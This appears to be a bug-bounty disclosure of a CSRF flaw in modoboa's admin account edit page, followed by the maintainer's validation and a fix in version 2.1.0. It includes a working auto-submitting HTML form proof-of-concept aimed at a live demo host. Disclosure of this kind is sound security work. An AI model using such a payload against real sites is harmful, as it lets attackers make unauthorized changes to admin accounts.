CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Login as admin. try to edit admin accounts (example id=4) Open the following file in the browser.

<!DOCTYPE html> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://demo.modoboa.org/admin/accounts/4/edit/"> <input type="hidden" name="active_tab" value="default" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Impact

Attacker would be forced to edit& update admin accounts

We are processing your report and will contact the modoboa team within 24 hours. 3 months ago
Antoine Nguyen validated this vulnerability 3 months ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade
3 months ago

Researcher


Can you assign a CVE please?

memmedrehimzade
3 months ago

Researcher


any update?

memmedrehimzade
2 months ago

Researcher


@admin

Ben Harvie
a month ago

Admin


The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f a month ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability a month ago
to join this conversation